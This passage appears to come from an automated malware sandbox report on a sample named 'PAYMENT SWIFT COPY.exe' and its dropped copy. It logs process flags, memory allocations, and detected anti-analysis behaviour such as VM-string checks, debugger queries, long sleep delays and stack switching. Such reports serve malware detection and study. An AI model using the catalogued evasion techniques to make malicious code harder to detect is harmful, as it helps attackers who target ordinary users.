                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\xcopy.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: PAYMENT SWIFT COPY.exe PID: 7508, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: NCchtKNKiPqC.exe PID: 8032, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\xcopy.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeMemory allocated: 1080000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeMemory allocated: 12E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeMemory allocated: 7CD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeMemory allocated: 8CD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeMemory allocated: 8E90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeMemory allocated: 9E90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeMemory allocated: A500000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeMemory allocated: B500000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeMemory allocated: C500000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeMemory allocated: 1030000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeMemory allocated: 2B20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeMemory allocated: 4B20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeMemory allocated: 77B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeMemory allocated: 87B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeMemory allocated: 8960000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeMemory allocated: 9960000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeMemory allocated: 9FB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeMemory allocated: AFB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0191096E rdtsc 8_2_0191096E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6580Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1152Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8074Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 835Jump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeWindow / User API: threadDelayed 9820
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeAPI coverage: 0.7 %
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeAPI coverage: 0.4 %
                Source: C:\Windows\SysWOW64\xcopy.exeAPI coverage: 2.7 %
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe TID: 7528Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep count: 6580 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7800Thread sleep count: 1152 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7980Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7984Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7944Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exe TID: 8156Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 7324Thread sleep count: 152 > 30
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 7324Thread sleep time: -304000s >= -30000s
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 7324Thread sleep count: 9820 > 30
                Source: C:\Windows\SysWOW64\xcopy.exe TID: 7324Thread sleep time: -19640000s >= -30000s
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe TID: 7760Thread sleep time: -80000s >= -30000s
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe TID: 7760Thread sleep count: 42 > 30
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe TID: 7760Thread sleep time: -63000s >= -30000s
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe TID: 7760Thread sleep count: 44 > 30
                Source: C:\Program Files (x86)\WKWXMBNzJflqxnHduppelWAeYimhCWfbuMdKoVtBorLFxeTs\drfYhRLxnrcfFY.exe TID: 7760Thread sleep time: -44000s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\xcopy.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\xcopy.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\xcopy.exeCode function: 15_2_0053C850 FindFirstFileW,FindNextFileW,FindClose,15_2_0053C850
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: NCchtKNKiPqC.exe, 00000009.00000002.1789198057.0000000000CE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: drfYhRLxnrcfFY.exe, 00000014.00000002.4140498303.0000000001559000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
                Source: PAYMENT SWIFT COPY.exe, 00000000.00000002.1739507734.0000000005DF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: xcopy.exe, 0000000F.00000002.4139981371.0000000002923000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2169577583.000001F959F4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\NCchtKNKiPqC.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\xcopy.exeProcess queried: DebugPort
                Source: C:\Windows\SysWOW64\xcopy.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0191096E rdtsc 8_2_0191096E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_00417953 LdrLoadDll,8_2_00417953
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195019F mov eax, dword ptr fs:[00000030h]8_2_0195019F
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195019F mov eax, dword ptr fs:[00000030h]8_2_0195019F
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195019F mov eax, dword ptr fs:[00000030h]8_2_0195019F
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0195019F mov eax, dword ptr fs:[00000030h]8_2_0195019F
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0198C188 mov eax, dword ptr fs:[00000030h]8_2_0198C188
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0198C188 mov eax, dword ptr fs:[00000030h]8_2_0198C188
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01910185 mov eax, dword ptr fs:[00000030h]8_2_01910185
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01974180 mov eax, dword ptr fs:[00000030h]8_2_01974180
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01974180 mov eax, dword ptr fs:[00000030h]8_2_01974180
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CA197 mov eax, dword ptr fs:[00000030h]8_2_018CA197
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CA197 mov eax, dword ptr fs:[00000030h]8_2_018CA197
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CA197 mov eax, dword ptr fs:[00000030h]8_2_018CA197
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194E1D0 mov eax, dword ptr fs:[00000030h]8_2_0194E1D0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194E1D0 mov eax, dword ptr fs:[00000030h]8_2_0194E1D0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194E1D0 mov ecx, dword ptr fs:[00000030h]8_2_0194E1D0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194E1D0 mov eax, dword ptr fs:[00000030h]8_2_0194E1D0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194E1D0 mov eax, dword ptr fs:[00000030h]8_2_0194E1D0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019961C3 mov eax, dword ptr fs:[00000030h]8_2_019961C3
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019961C3 mov eax, dword ptr fs:[00000030h]8_2_019961C3
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019001F8 mov eax, dword ptr fs:[00000030h]8_2_019001F8
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A61E5 mov eax, dword ptr fs:[00000030h]8_2_019A61E5
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01990115 mov eax, dword ptr fs:[00000030h]8_2_01990115
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197A118 mov ecx, dword ptr fs:[00000030h]8_2_0197A118
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197A118 mov eax, dword ptr fs:[00000030h]8_2_0197A118
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197A118 mov eax, dword ptr fs:[00000030h]8_2_0197A118
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197A118 mov eax, dword ptr fs:[00000030h]8_2_0197A118
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197E10E mov eax, dword ptr fs:[00000030h]8_2_0197E10E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197E10E mov ecx, dword ptr fs:[00000030h]8_2_0197E10E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197E10E mov eax, dword ptr fs:[00000030h]8_2_0197E10E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197E10E mov eax, dword ptr fs:[00000030h]8_2_0197E10E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197E10E mov ecx, dword ptr fs:[00000030h]8_2_0197E10E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197E10E mov eax, dword ptr fs:[00000030h]8_2_0197E10E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197E10E mov eax, dword ptr fs:[00000030h]8_2_0197E10E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197E10E mov ecx, dword ptr fs:[00000030h]8_2_0197E10E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197E10E mov eax, dword ptr fs:[00000030h]8_2_0197E10E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0197E10E mov ecx, dword ptr fs:[00000030h]8_2_0197E10E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01900124 mov eax, dword ptr fs:[00000030h]8_2_01900124
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01968158 mov eax, dword ptr fs:[00000030h]8_2_01968158
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01964144 mov eax, dword ptr fs:[00000030h]8_2_01964144
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01964144 mov eax, dword ptr fs:[00000030h]8_2_01964144
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01964144 mov ecx, dword ptr fs:[00000030h]8_2_01964144
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01964144 mov eax, dword ptr fs:[00000030h]8_2_01964144
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01964144 mov eax, dword ptr fs:[00000030h]8_2_01964144
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D6154 mov eax, dword ptr fs:[00000030h]8_2_018D6154
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D6154 mov eax, dword ptr fs:[00000030h]8_2_018D6154
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018CC156 mov eax, dword ptr fs:[00000030h]8_2_018CC156
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A4164 mov eax, dword ptr fs:[00000030h]8_2_019A4164
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019A4164 mov eax, dword ptr fs:[00000030h]8_2_019A4164
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D208A mov eax, dword ptr fs:[00000030h]8_2_018D208A
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019960B8 mov eax, dword ptr fs:[00000030h]8_2_019960B8
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019960B8 mov ecx, dword ptr fs:[00000030h]8_2_019960B8
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018C80A0 mov eax, dword ptr fs:[00000030h]8_2_018C80A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019680A8 mov eax, dword ptr fs:[00000030h]8_2_019680A8
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019520DE mov eax, dword ptr fs:[00000030h]8_2_019520DE
